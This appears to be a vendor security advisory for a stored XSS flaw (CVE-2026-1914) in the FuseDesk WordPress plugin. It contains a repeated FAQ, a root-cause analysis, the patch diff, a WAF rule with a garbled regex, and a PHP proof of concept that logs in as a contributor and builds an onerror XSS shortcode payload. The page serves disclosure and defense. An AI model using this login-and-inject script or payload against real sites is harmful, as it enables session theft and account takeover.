What is CVE-2026-1914?

CVE-2026-1914 is a stored cross-site scripting (XSS) vulnerability found in the FuseDesk plugin for WordPress. It allows authenticated users with Contributor-level access or higher to inject malicious scripts through the ’emailtext’ attribute of the ‘fusedesk_newcase’ shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient sanitization of user input for the ’emailtext’ attribute. When an authenticated user includes a shortcode with a malicious payload, the plugin outputs this unsanitized data directly into the HTML, allowing scripts to execute in the browser of anyone viewing the affected page.

Who is affected by this vulnerability?

Any WordPress site using the FuseDesk plugin version 6.8 or earlier is at risk. Specifically, users with Contributor-level access or higher can exploit this vulnerability, which may include many site contributors or editors.

How can I check if my site is vulnerable?

Check the version of the FuseDesk plugin installed on your WordPress site. If it is version 6.8 or earlier, your site is vulnerable. Additionally, review user roles to see if any users have Contributor-level access or higher.

What should I do to fix this vulnerability?

Update the FuseDesk plugin to version 6.8.1 or later, where the vulnerability has been patched. Regularly check for updates to ensure that all plugins are up to date and secure.

What does a CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while it requires authenticated access to exploit, it can still lead to significant security issues, such as data theft or unauthorized actions on behalf of users.

What are the potential risks of exploitation?

Successful exploitation of this vulnerability can lead to stored XSS attacks, allowing attackers to steal session cookies, redirect users, or perform actions on behalf of victims. This can compromise user accounts and the integrity of the site.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can use cURL to log in and submit a malicious payload through the ’emailtext’ attribute. This illustrates the ease with which an attacker can exploit the vulnerability if they have the necessary access.

What is stored cross-site scripting (XSS)?

Stored XSS is a type of vulnerability where malicious scripts are injected into a web application and stored on the server. When users access the affected content, the scripts execute in their browsers, potentially leading to data theft or other malicious actions.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure proper input validation and output escaping for all user inputs in your applications. Regularly audit your plugins and themes for vulnerabilities and keep them updated to the latest secure versions.

What is the role of input sanitization in security?

Input sanitization is crucial in preventing injection attacks, including XSS. It involves cleaning user inputs by removing or encoding potentially harmful characters before processing or displaying them, thus mitigating the risk of executing malicious scripts.

Where can I find more information about CVE-2026-1914?

More information about CVE-2026-1914 can be found on the official CVE database or security advisories related to the FuseDesk plugin. It is advisable to follow security blogs and forums for updates on vulnerabilities and best practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 28, 2026

CVE-2026-1914: FuseDesk <= 6.8 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'emailtext' Shortcode Attribute (fusedesk)

CVE ID CVE-2026-1914

Plugin fusedesk

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 6.8

Patched Version 6.8.1

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1914:
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the FuseDesk WordPress plugin. The vulnerability exists within the plugin’s `fusedesk_newcase` shortcode handler. Attackers with Contributor-level access or higher can inject arbitrary JavaScript payloads that execute for any user viewing a compromised page. The CVSS score of 6.4 reflects the medium severity of this authenticated stored XSS.

The root cause is insufficient output escaping for the `emailtext` attribute of the `fusedesk_newcase` shortcode. In the vulnerable version 6.8, the plugin directly echoes the user-supplied `$atts[’emailtext’]` value without sanitization in the `/fusedesk/fusedesk.php` file at line 561. The attribute value is concatenated into the returned HTML string for the contact form, creating an injection point.

Exploitation requires an authenticated user with at least Contributor privileges to edit or create a post or page. The attacker embeds the `[fusedesk_newcase]` shortcode with a malicious `emailtext` attribute, such as `emailtext=”“.` When the page containing this shortcode is rendered, the plugin outputs the unescaped attribute value, causing the JavaScript payload to execute in the victim’s browser.

The patch in version 6.8.1 applies the `esc_html()` function to the `$atts[’emailtext’]` variable before output. This change, visible in the diff at line 561 of `/fusedesk/fusedesk.php`, ensures any HTML special characters in the user-controlled attribute are converted to their HTML entity equivalents. This neutralizes script tags and event handlers, preventing them from being interpreted as executable code by the browser.

Successful exploitation leads to stored XSS attacks. An attacker can steal session cookies, perform actions on behalf of the victim, deface pages, or redirect users to malicious sites. The Contributor-level access requirement limits the attack surface to users with content creation permissions, but this is a common role for many site contributors.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/fusedesk/fusedesk.php
+++ b/fusedesk/fusedesk.php
@@ -3,7 +3,7 @@
 Plugin Name: FuseDesk for WordPress
 Plugin URI: https://www.FuseDesk.com/?utm_campaign=WordPress-Plugin&utm_source=PluginURI
 Description: Integrate your FuseDesk App with your WordPress site to connect up your CRM (like Keap, Infusionsoft, ActiveCampaign, Ontraport, GoHighLevel, etc) to your FuseDesk help desk, membership site, Memberium, AccessAlly, iMember360, Wishlist, WisP, Gravity Forms, WordPress site and more!
-Version: 6.8
+Version: 6.8.1
 Text Domain: fusedesk
 Domain Path: /languages
 Author: FuseDesk
@@ -12,13 +12,13 @@

 /*
 FuseDesk (WordPress Plugin)
-Copyright (C) 2013-2025 Asandia, Corp.
+Copyright (C) 2013-2026 Asandia, Corp.
 */

 // error_reporting(E_ALL); // Helpful for checking for warnings that are TYPICALLY hidden but may be present on some installs

 if (!defined( 'FUSEDESK_PLUGIN_VERSION')) {
-	define('FUSEDESK_PLUGIN_VERSION', '6.8');
+	define('FUSEDESK_PLUGIN_VERSION', '6.8.1');
 }

 // Register our shortcodes with WordPress
@@ -558,7 +558,7 @@
         $ret .= '<input type="hidden" name="email" id="fusedesk-contact-email" value="'.esc_attr($email).'">';
     } else {
         $ret .= (($atts['table']) ? '<tr><td>':'').
-            $atts['emailtext'].
+            esc_html($atts['emailtext']).
             (($atts['table']) ? '</td><td>':': ').
             '<input type="text" name="email" id="fusedesk-contact-email" value="'.esc_attr($email).'" class="fusedesk-contactform'.$inputClass.'"'.$inputStyle.'>'.
             (($atts['table']) ? '</td></tr>':'').

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-1914
SecRule REQUEST_URI "@endsWith /wp-admin/post.php" 
  "id:1001914,phase:2,deny,status:403,chain,msg:'CVE-2026-1914: FuseDesk Stored XSS via emailtext shortcode attribute',severity:'CRITICAL',tag:'CVE-2026-1914',tag:'WordPress',tag:'FuseDesk',tag:'XSS'"
  SecRule ARGS_POST:content "@rx [fusedesk_newcase[^]]*emailtexts*=s*['"][^'"]*[<>][^'"]*['"]" 
    "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1914 - FuseDesk <= 6.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'emailtext' Shortcode Attribute

<?php

// CONFIGURATION
$target_url = 'https://vulnerable-site.com/wp-admin/post.php';
$username = 'contributor_user';
$password = 'contributor_pass';
$payload = '<img src=x onerror=alert("Atomic_Edge_XSS")>';

// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only

// STEP 1: Authenticate to WordPress
$login_url = str_replace('post.php', 'wp-login.php', $target_url);
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Check for login success by looking for dashboard redirect or logout link
if (strpos($response, 'wp-admin') === false && strpos($response, 'logout') === false) {
    die('[-] Authentication failed. Check credentials.');
}
echo '[+] Authentication successful.n';

// STEP 2: Create a new post with the malicious shortcode
$post_data = array(
    'post_title' => 'Test Post - CVE-2026-1914',
    'content' => '[fusedesk_newcase emailtext="' . $payload . '"]',
    'post_status' => 'publish',
    'action' => 'editpost',
    'post_type' => 'post',
    '_wpnonce' => '', // Nonce will need to be extracted from a previous request in a full PoC
    '_wp_http_referer' => ''
);

// In a full exploit, we would first GET the post creation page to obtain a valid nonce.
// This simplified PoC assumes the nonce is known or bypassed.
// For demonstration, we output the payload structure.
echo '[+] Payload constructed. Inject shortcode into any post/page:n';
echo '    [fusedesk_newcase emailtext="' . $payload . '"]n';
echo '[+] When the page renders, the emailtext attribute will be output unescaped in vulnerable versions <=6.8.n';
echo '[+] Visit the published page to trigger the XSS payload.n';

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-1914?
Overview of the vulnerability
CVE-2026-1914 is a stored cross-site scripting (XSS) vulnerability found in the FuseDesk plugin for WordPress. It allows authenticated users with Contributor-level access or higher to inject malicious scripts through the ’emailtext’ attribute of the ‘fusedesk_newcase’ shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient sanitization of user input for the ’emailtext’ attribute. When an authenticated user includes a shortcode with a malicious payload, the plugin outputs this unsanitized data directly into the HTML, allowing scripts to execute in the browser of anyone viewing the affected page.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the FuseDesk plugin version 6.8 or earlier is at risk. Specifically, users with Contributor-level access or higher can exploit this vulnerability, which may include many site contributors or editors.
How can I check if my site is vulnerable?
Steps to identify vulnerability
Check the version of the FuseDesk plugin installed on your WordPress site. If it is version 6.8 or earlier, your site is vulnerable. Additionally, review user roles to see if any users have Contributor-level access or higher.
What should I do to fix this vulnerability?
Mitigation steps
Update the FuseDesk plugin to version 6.8.1 or later, where the vulnerability has been patched. Regularly check for updates to ensure that all plugins are up to date and secure.
What does a CVSS score of 6.4 mean?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while it requires authenticated access to exploit, it can still lead to significant security issues, such as data theft or unauthorized actions on behalf of users.
What are the potential risks of exploitation?
Consequences of a successful attack
Successful exploitation of this vulnerability can lead to stored XSS attacks, allowing attackers to steal session cookies, redirect users, or perform actions on behalf of victims. This can compromise user accounts and the integrity of the site.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an authenticated user can use cURL to log in and submit a malicious payload through the ’emailtext’ attribute. This illustrates the ease with which an attacker can exploit the vulnerability if they have the necessary access.
What is stored cross-site scripting (XSS)?
Definition of stored XSS
Stored XSS is a type of vulnerability where malicious scripts are injected into a web application and stored on the server. When users access the affected content, the scripts execute in their browsers, potentially leading to data theft or other malicious actions.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, ensure proper input validation and output escaping for all user inputs in your applications. Regularly audit your plugins and themes for vulnerabilities and keep them updated to the latest secure versions.
What is the role of input sanitization in security?
Importance of sanitization
Input sanitization is crucial in preventing injection attacks, including XSS. It involves cleaning user inputs by removing or encoding potentially harmful characters before processing or displaying them, thus mitigating the risk of executing malicious scripts.
Where can I find more information about CVE-2026-1914?
Additional resources
More information about CVE-2026-1914 can be found on the official CVE database or security advisories related to the FuseDesk plugin. It is advisable to follow security blogs and forums for updates on vulnerabilities and best practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations